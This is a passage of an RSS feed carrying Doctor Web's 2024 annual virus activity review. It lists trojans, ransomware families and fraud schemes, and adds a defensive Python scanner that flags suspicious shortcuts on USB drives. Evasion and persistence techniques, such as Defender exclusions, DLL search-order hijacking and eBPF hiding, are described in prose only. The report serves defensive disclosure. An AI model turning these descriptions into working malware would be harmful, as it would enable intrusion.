        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojan apps distributed under the guise of financial software: «Умные Деньги» (“Smart Money”) is &lt;b&gt;Android.FakeApp.1803&lt;/b&gt;, 
        and “Economic Union” is &lt;b&gt;Android.FakeApp.1777&lt;/b&gt;
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        Under certain conditions, other &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans loaded bookmaker and online casino sites. Such malware variants were distributed as different games and other software, 
        like a speed-typing trainer and a drawing tutorial. Among them were new modifications of the 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1669&lt;/b&gt; trojan.
    &lt;/p&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/13_Android.FakeApp.1669_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/13_Android.FakeApp.1669_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
              &lt;a href="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/14_Android.FakeApp.1669_q1_2025.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/april/review_mobile_q1/14_Android.FakeApp.1669_q1_2025.png" alt="Android.FakeApp_Q1_2025" style="max-width: 350px;"&gt;
              &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of malicious fake apps that, instead of providing the declared functionality, could load online casino and bookmaker websites
    &lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;
        To protect your Android device from malware and unwanted programs, we recommend installing Dr.Web anti-virus products for Android.
    &lt;/p&gt;
&lt;/section&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q1%202025%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;


</description></item><item><guid>https://news.drweb.com/show/?i=14965&amp;lng=en</guid><title>Doctor Web’s annual virus activity review for 2024</title><link>https://news.drweb.com/show/?i=14965&amp;lng=en&amp;c=9</link><pubDate>Thu, 30 Jan 2025 00:00:00 GMT</pubDate><description>


&lt;p&gt;&lt;b&gt;January 30, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section class="margTM margBM" id="main"&gt;
    &lt;p&gt;&lt;newslead&gt;In 2024, malicious programs created with the AutoIt scripting language and distributed as part of other malicious apps to make the latter more difficult to detect were once again among the most widespread threats. In addition, adware trojans and all kinds of malicious scripts were highly active. In email traffic, malicious scripts were also most commonly detected. Furthermore, threat actors used spam emails to distribute various trojans, phishing documents, and exploits that allow arbitrary code to be executed.&lt;/newslead&gt;&lt;/p&gt;
    &lt;p&gt;
        Ad-displaying trojans, spyware trojans, and unwanted adware apps were the threats most commonly 
        detected on mobile devices. Throughout the year, increasing activity on the part of mobile banking 
        trojans was observed. In addition, our virus laboratory discovered hundreds of malicious and unwanted 
        programs on Google Play.
    &lt;/p&gt;
    &lt;p&gt;
        Doctor Web’s Internet analysts noted high activity on the part of online fraudsters, whose arsenal included both old and new schemes for deceiving users.
    &lt;/p&gt;
    &lt;p&gt;
        Compared to 2023, the number of user requests to decrypt files affected by encoder trojans decreased. 
        At the same time, our specialists observed many information security incidents and events. 
        Over the course of the year, Doctor Web investigated several targeted attacks, uncovered another infection 
        impacting Android TV boxes, and repelled an attack on its own infrastructure.
    &lt;/p&gt;
    
    &lt;div class="paddXM paddYM bg_ocean_1 white custom-color-link"&gt;
        &lt;h4 class="white alignCenter"&gt;Principal trends of the year&lt;/h4&gt;
        &lt;ul&gt;
          &lt;li&gt;Trojans created with the AutoIt scripting language remained highly active.&lt;/li&gt;
          &lt;li&gt;Malicious scripts were among the most widespread threats.&lt;/li&gt;
          &lt;li&gt;Malicious scripts and various trojans were among the threats most commonly detected in email traffic.&lt;/li&gt;
          &lt;li&gt;New targeted attacks were detected.&lt;/li&gt;
          &lt;li&gt;Threat actors exploited eBPF technology more often to conceal their malicious activity.&lt;/li&gt;
          &lt;li&gt;The number of requests to decrypt files affected by encoder trojans decreased.&lt;/li&gt;
          &lt;li&gt;Internet fraudsters were highly active.&lt;/li&gt;
          &lt;li&gt;Cybercriminals used mobile banking trojans more frequently.&lt;/li&gt;
          &lt;li&gt;Many new threats were discovered on Google Play.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="stat"&gt;
    &lt;h2 class="alignCenter"&gt;The most notable events of 2024&lt;/h2&gt;
    &lt;p&gt;
        In January, Doctor Web’s specialists &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14792" target="_blank" rel="noopener noreferrer"&gt;informed&lt;/a&gt; 
        customers about the mining trojan &lt;a href="https://vms.drweb.com/search/?q=Trojan.BtcMine.3767&amp;lng=en"&gt;&lt;b&gt;Trojan.BtcMine.3767&lt;/b&gt;&lt;/a&gt;, which was concealed in pirated programs that were being 
        distributed via a specially created Telegram channel and a number of websites. This malware infected tens of thousands of 
        Windows computers. To anchor itself in an attacked system, it created a scheduler task for its own autorun and added itself 
        to the Windows Defender anti-virus exceptions. Next, it injected a component directly responsible for cryptocurrency mining into 
        &lt;span class="string"&gt;explorer.exe&lt;/span&gt; (Windows Explorer). 
        &lt;a href="https://vms.drweb.com/search/?q=Trojan.BtcMine.3767&amp;lng=en"&gt;&lt;b&gt;Trojan.BtcMine.3767&lt;/b&gt;&lt;/a&gt; also allowed a number of other malicious actions to be performed, e.g., fileless rootkits can be installed, 
        access to websites can be blocked, and Windows updates can be disabled.
    &lt;/p&gt;
    &lt;p&gt;
        In March, our company &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14823" target="_blank" rel="noopener noreferrer"&gt;published research&lt;/a&gt; 
        on a targeted attack against a Russian enterprise in the mechanical-engineering sector. An investigation into the incident revealed a multi-stage 
        infection vector and the use of several malicious programs by the attackers. Among these programs, of greatest interest was the &lt;a href="https://vms.drweb.com/search/?q=JS.BackDoor.60&amp;lng=en"&gt;&lt;b&gt;JS.BackDoor.60&lt;/b&gt;&lt;/a&gt; 
        backdoor, through which the main interaction between the attackers and the infected computer took place. This trojan uses its own JavaScript framework and 
        consists of a main body and additional modules. It allows files to be stolen from infected machines, keystrokes to be hijacked, and screenshots to be taken. 
        It can download its own updates and expand its functionality by downloading new modules.
    &lt;/p&gt;
    &lt;p&gt;
        In May, Doctor Web’s virus analysts &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14860" target="_blank" rel="noopener noreferrer"&gt;discovered&lt;/a&gt; 
        the trojan clicker &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; in Love Spouse, an app used to control adult toys, and also in the QRunning app, used to track 
        physical activity. Both were distributed through Google Play. &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; was disguised as a component for collecting debugging 
        information and was embedded into several new versions of the target apps. Later, the developer of the Love Spouse program updated the app, and the 
        trojan was no longer present in it. There was no reaction from the developer of the second program. &lt;a href="https://vms.drweb.com/search/?q=Android.Click.414.origin&amp;lng=en"&gt;&lt;b&gt;Android.Click.414.origin&lt;/b&gt;&lt;/a&gt; 
        had a modular architecture and could perform various malicious tasks with the help of its components. It could collect information about an infected device, 
        covertly load webpages, display ads, perform clicks, and interact with the contents of loaded pages.
    &lt;/p&gt;
    &lt;p&gt;
        In July, we &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14877" target="_blank" rel="noopener noreferrer"&gt;informed&lt;/a&gt; users about the emergence of a Linux version 
        of the well-known remote access trojan TgRat, which is used for targeted attacks on computers. Dubbed &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.TgRat.2&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.TgRat.2&lt;/b&gt;&lt;/a&gt;, the new variant of this 
        malware was discovered during an investigation into an information security incident that a hosting provider contacted us about. Dr.Web anti-virus detected a suspicious 
        file on the server of one of their clients; it turned out to be the backdoor dropper that actually installed the trojan. Threat actors controlled 
        &lt;a href="https://vms.drweb.com/search/?q=Linux.BackDoor.TgRat.2&amp;lng=en"&gt;&lt;b&gt;Linux.BackDoor.TgRat.2&lt;/b&gt;&lt;/a&gt; through a private Telegram group, using the Telegram bot connected to it. 
        Through the messenger, they could download files from a compromised system, take screenshots, remotely execute commands, or upload files to a computer via chat attachments.
    &lt;/p&gt;
    &lt;p&gt;
        In early September, we published an &lt;a href="https://news.drweb.com/show/?i=14899&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;article&lt;/a&gt; 
        on our website, detailing the case of a failed spear-phishing attack on a major Russian enterprise in the rail freight industry. Several months 
        earlier, the company’s information security team had detected a suspicious email with a file attached to it. Our virus analysts’ examination of 
        it showed that it was a Windows shortcut disguised as a PDF document, and that it had hardcoded parameters for launching the PowerShell command 
        interpreter. Opening this shortcut would lead to a multi-stage infection of the target system, with several malicious programs designed for cyber 
        espionage. One of them was &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen27.11306&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen27.11306&lt;/b&gt;&lt;/a&gt;, which exploited the 
        &lt;a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6473" target="_blank" rel="noopener noreferrer"&gt;CVE-2024-6473&lt;/a&gt; vulnerability in 
        Yandex Browser to hijack the DLL search order (DLL Search Order Hijacking). The trojan placed a malicious DLL into the browser installation 
        directory; this file had the same name as the system component &lt;span class="string"&gt;Wldp.dll&lt;/span&gt;, which is responsible for securely launching applications. 
        Because the malicious file was located in the browser directory, the vulnerable browser loaded it in preference to the legitimate system library 
        when the program was launched. The library also obtained all the permissions of the browser. This vulnerability was later fixed.
    &lt;/p&gt;
    &lt;p&gt;
        A little later, our specialists &lt;a href="https://news.drweb.com/show/?i=14900&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;reported&lt;/a&gt; 
        on another attack on Android-based TV boxes. In this campaign, the malicious program &lt;a href="https://vms.drweb.com/search/?q=Android.Vo1d&amp;lng=en"&gt;&lt;b&gt;Android.Vo1d&lt;/b&gt;&lt;/a&gt; 
        was used. It infected nearly 1.3 million devices belonging to users in 197 countries. This was a modular backdoor that placed its components 
        into the system storage area and, upon receiving the attackers’ commands, could covertly download and run other programs.
    &lt;/p&gt;
    &lt;p&gt;
        Moreover, in September, we detected a &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14904" target="_blank" rel="noopener noreferrer"&gt;targeted attack&lt;/a&gt; 
        on our company’s resources. Doctor Web’s specialists promptly stopped the attempt to damage our infrastructure, 
        &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14907" target="_blank" rel="noopener noreferrer"&gt;successfully repelling the attack&lt;/a&gt;. 
        At the same time, none of our users were harmed.
    &lt;/p&gt;
    &lt;p&gt;
        In October, Doctor Web’s virus analysts &lt;a href="https://news.drweb.com/show/?i=14918&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;reported&lt;/a&gt;
        on the discovery of a number of new malicious programs for Linux. They were uncovered thanks to a study of attacks on devices that had the Redis 
        database management system installed on them. This system is increasingly becoming the target of cybercriminals wanting to exploit the various 
        vulnerabilities in it. Among the threats detected were backdoors, droppers, and a new modification of a rootkit that installs the Skidmap mining 
        trojan on compromised devices. This miner has been active since 2019, and its primary targets are large servers and cloud environments.
    &lt;/p&gt;
    &lt;p&gt;
        Also in October, our virus laboratory uncovered a &lt;a href="https://news.drweb.com/show/?i=14920&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;large-scale campaign&lt;/a&gt;
        aimed at distributing malware for cryptocurrency mining and theft. Over 28,000 users, most of whom were from Russia, suffered from the actions of the attackers. The trojans 
        were hiding in pirated software that was being distributed via fraudulent websites created on the GitHub platform. In addition, the malware creators placed links for downloading 
        malicious programs under videos posted on the YouTube platform.
    &lt;/p&gt;
    &lt;p&gt;
        In November, our experts &lt;a href="https://news.drweb.com/show/?i=14935&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;discovered&lt;/a&gt;
        a number of new variants of the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; trojan, whose task is to load websites. Unlike similar malware, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp.1669&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp.1669&lt;/b&gt;&lt;/a&gt; receives target website addresses from the TXT records of malicious DNS servers. For this, it uses the modified 
        code of the open-source library dnsjava. At the same time, the trojan exhibits malicious activity only when connected to the Internet through 
        certain providers. In other cases, it operates as harmless software.
    &lt;/p&gt;
    &lt;p&gt;
        At the end of 2024, while investigating a request from one of our clients, Doctor Web’s virus laboratory specialists detected an ongoing
        &lt;a href="https://news.drweb.com/show/?lng=en&amp;i=14955" target="_blank" rel="noopener noreferrer"&gt;hacker campaign&lt;/a&gt;
        primarily targeting users from Southeast Asia. During the attacks, cybercriminals used a range of malicious programs as well as methods 
        and techniques that are only increasing in popularity among virus writers. One of them involves exploiting eBPF (extended Berkeley Packet 
        Filter) technology, which was created to provide enhanced control over the network subsystem of the Linux operating system and its processes. 
        This technology was used to conceal malicious network activity and processes, collect confidential information, and bypass firewalls and 
        intrusion detection systems. Another technique involved storing the trojan configuration not on the C&amp;C server, but on public platforms such 
        as GitHub and blogs. The third feature of the attacks was the use of post-exploitation frameworks in tandem with malicious apps. Although such 
        tools are not malicious and are used in security audits of digital systems, their functionality and the presence of vulnerability databases 
        can expand the capabilities of attackers.
    &lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="virobst"&gt;
    &lt;h2 class="alignCenter"&gt;The malware landscape&lt;/h2&gt;
    &lt;p&gt;
        According to the statistics collected by Dr.Web anti-virus, the total number of threats detected in 2024 increased by 26.20%, compared to 2023. 
        The number of unique threats increased by 51.22%. Among the most common malicious programs were trojans created in the AutoIt scripting language. 
        They are distributed as part of other malware and are designed to make the latter more difficult to detect. Moreover, users encountered various malicious scripts and adware trojans.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/01_stat_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/01_stat_2024_en.png" alt="stat_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server whose time zone corresponds to a Russian city.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1224&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1131&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1124&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1222&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for packed versions of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious app that are written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; performs various malicious actions that make it difficult for the main payload to be detected.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.StartPage1.62722&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious program that can modify the home page in the browser settings.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.BPlug.3814&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for malicious components of the WinSafe browser extension. These components are JavaScript files that display intrusive ads in browsers.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows containing the text &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; and &lt;span class="string"&gt;розробника&lt;/span&gt; and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;BAT.AVKill.37&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A component of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious program. This script launches other malware components, sets them to autorun via Windows Task Scheduler, and also adds them to Windows Defender’s anti-virus exceptions.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Unsecure.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan that blocks the launch of anti-viruses and other software through AppLocker policies in the Windows operating system.&lt;/dd&gt;
    &lt;/dl&gt;

    &lt;p&gt;
        As for email threats, the most widespread were various malicious scripts and all kinds of trojans, including backdoors, 
        malware downloaders and droppers, trojans with spyware functionality, malicious cryptocurrency miners, and others. 
        Threat actors also distributed phishing documents, often fake login forms mimicking those on popular websites. 
        Additionally, users encountered worms and malicious apps that exploit vulnerabilities in Microsoft Office documents.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/02_email_traffic_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/02_email_traffic_2024_en.png" alt="mail_traffic_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of Russian cities.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Inject&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A family of malicious JavaScripts that inject a malicious script into the HTML code of webpages.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;LNK.Starter.56&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a specially crafted shortcut. It is distributed via removable media such as USB flash drives and, to mislead users and conceal its activity, uses the default icon of a disk drive. When launched, it executes malicious VBS scripts from a hidden directory located on the same drive as the shortcut itself.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Win32.HLLW.Rendoc.3&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A network worm that spreads via removable storage media and other channels.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;An exploit designed to take advantage of Microsoft Office software vulnerabilities so that an attacker can run arbitrary code.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1122&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;The detection name for a packed version of the &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; malicious app that is written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. &lt;a href="https://vms.drweb.com/search/?q=Trojan.AutoIt.289&amp;lng=en"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; performs various malicious actions that make it difficult for the main payload to be detected.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.SpyBot.699&amp;lng=en"&gt;&lt;b&gt;Trojan.SpyBot.699&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;A multi-module banking trojan. It allows cybercriminals to download and launch various applications on infected devices and run arbitrary code.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;VBS.BtcMine.13&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;VBS.BtcMine.12&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A VBS script designed to covertly mine cryptocurrencies.&lt;/dd&gt;
    &lt;/dl&gt;
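    &lt;p&gt;
        The pattern described for LNK.Starter.56 above (a shortcut in the root of a removable drive, with scripts kept in a hidden directory on the same drive) can be triaged with a short script. 
        The following is an added example written for this review, not code from Doctor Web: it reports root-level .lnk files and script files found inside hidden directories, and flags the drive only when both are present. 
        The drive layout it builds is constructed, the function names are hypothetical, and it does not parse the shortcut's binary target, so it cannot tell what the shortcut itself would run.
    &lt;/p&gt;

```python
"""Added triage check (not Doctor Web's code) for the removable-media pattern described
for LNK.Starter.56: a shortcut in the drive root plus script files in a hidden directory
on the same drive. Heuristic only: it does not parse the Shell Link binary format, so it
cannot tell what the shortcut itself would run."""

import operator
import os
import shutil
import stat
import tempfile

# Script types the Windows Script Host will run from a shortcut (hypothetical selection)
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf"}


def is_hidden(path):
    """True for the Windows Hidden attribute or, as a portable fallback also used by the
    constructed sample, a dot-prefixed name."""
    name = os.path.basename(path.rstrip(os.sep))
    if name.startswith("."):
        return True
    attrs = getattr(os.stat(path), "st_file_attributes", 0)
    return operator.and_(attrs, stat.FILE_ATTRIBUTE_HIDDEN) != 0


def scan_drive_root(root):
    """Report root-level shortcuts and hidden directories holding script files.
    'suspicious' is set only when both halves of the pattern are present."""
    with os.scandir(root) as entries:
        root_shortcuts = sorted(
            e.name for e in entries if e.is_file() and e.name.lower().endswith(".lnk")
        )
    hidden_script_dirs = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        if dirpath == root or not is_hidden(dirpath):
            continue
        scripts = sorted(
            f for f in filenames if os.path.splitext(f)[1].lower() in SCRIPT_EXTENSIONS
        )
        if scripts:
            hidden_script_dirs[os.path.relpath(dirpath, root)] = scripts
    return {
        "root_shortcuts": root_shortcuts,
        "hidden_script_dirs": hidden_script_dirs,
        "suspicious": bool(root_shortcuts) and bool(hidden_script_dirs),
    }


def build_sample_drive(root):
    """Constructed sample layout; every file is a placeholder, not real malware."""
    hidden = os.path.join(root, ".sys")
    os.makedirs(hidden)
    with open(os.path.join(hidden, "run.vbs"), "w") as f:
        f.write("' placeholder text, not a real script\n")
    with open(os.path.join(root, "Removable Disk.lnk"), "wb") as f:
        f.write(b"\x4c\x00\x00\x00")  # placeholder bytes, not a real shortcut header
    with open(os.path.join(root, "holiday.jpg"), "wb") as f:
        f.write(b"")


def demo():
    """Build the sample in a temporary directory, scan it, and clean up."""
    root = tempfile.mkdtemp(prefix="lnk_scan_")
    try:
        build_sample_drive(root)
        return scan_drive_root(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    print(scan_drive_root(target) if target else demo())
```

    &lt;p&gt;
        Run it with the root of a mounted removable drive as the only argument to scan that drive; without arguments it scans the constructed sample. A positive result is a reason to examine the shortcut and the scripts, not proof of infection on its own.
    &lt;/p&gt;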
&lt;/section&gt;

&lt;section class="margTM margBM" id="encruptor"&gt;
    &lt;h2 class="alignCenter"&gt;Encryption ransomware&lt;/h2&gt;
    &lt;p&gt;
        Compared with 2023, in 2024, Doctor Web’s technical support service registered 33.05% fewer user requests to decrypt 
        files affected by encryption trojans. How the number of those requests changed over the year is shown in the graph below:
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/03_encoder_requests_14_2024_en.1.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/03_encoder_requests_14_2024_en.1.png" alt="encoders_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;The most common encoders of 2024:&lt;/p&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; (13.13% of user requests)&lt;/dt&gt;
        &lt;dd&gt;An encoder trojan also known as Mimic. It uses the everything.dll library from the legitimate software Everything, which is designed to instantly locate files on Windows computers.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.3953&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.3953&lt;/b&gt;&lt;/a&gt; (12.10% of user requests)&lt;/dt&gt;
        &lt;dd&gt;An encoder trojan that has several versions and modifications. It uses the AES-256 algorithm in CBC mode to encrypt files.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; (7.44% of user requests)&lt;/dt&gt;
        &lt;dd&gt;A trojan encoder known as STOP Ransomware. It attempts to obtain a private key from a server and, if unsuccessful, uses a hardcoded one. It uses the Salsa20 stream cipher to encrypt files.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; (2.21% of user requests)&lt;/dt&gt;
        &lt;dd&gt;An encoder trojan also known as Macop (&lt;b&gt;Trojan.Encoder.30572&lt;/b&gt; is one of its other variants). It is small, about 30-40 Kbytes, partly because the trojan carries no third-party cryptographic libraries and relies exclusively on CryptoAPI functions for encryption and key generation. It uses the AES-256 algorithm to encrypt files, and the keys themselves are encrypted with RSA-1024.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Encoder.37369&lt;/b&gt; (2.10% of user requests)&lt;/dt&gt;
        &lt;dd&gt;One of many modifications of #Cylance ransomware. To encrypt files, it uses the ChaCha12 algorithm with the Curve25519 (X25519) elliptic curve key exchange scheme.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="netfraud"&gt;
    &lt;h2 class="alignCenter"&gt;Network fraud&lt;/h2&gt;
    &lt;p&gt;
        Over the course of 2024, Doctor Web’s Internet analysts observed high activity on the part of cyber fraudsters 
        using both traditional and new scenarios to deceive users. In the Russian segment of the Internet, the most 
        widespread schemes were again those using fraudulent sites of multiple formats. Some of them were fake sites 
        of online stores and social networks with promotions and prize draws allegedly sponsored by them. Potential 
        victims always “win” on such websites, but to get their nonexistent prize, they are asked to pay a “commission”.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/04_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/04_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fraudulent site, allegedly related to a Russian online store, offers the visitor the chance to participate in a nonexistent prize draw&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/05_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/05_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fake social network website offers the chance to “try your luck” and win large cash prizes or other gifts&lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        One of the current variants of such a scheme is not new: fake websites of retailers and household appliance and electronics stores offer 
        users the opportunity to buy goods at a discount. On such sites, potential victims are typically asked to pay for their “orders” with a bank card, 
        but last year fraudsters also started offering the Faster Payment System as a payment option.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_common/06_fraud_2024.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_common/06_fraud_2024.png" alt="netfraud_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;A fake website of a household appliance and electronics store promises potential victims big discounts&lt;/em&gt;&lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
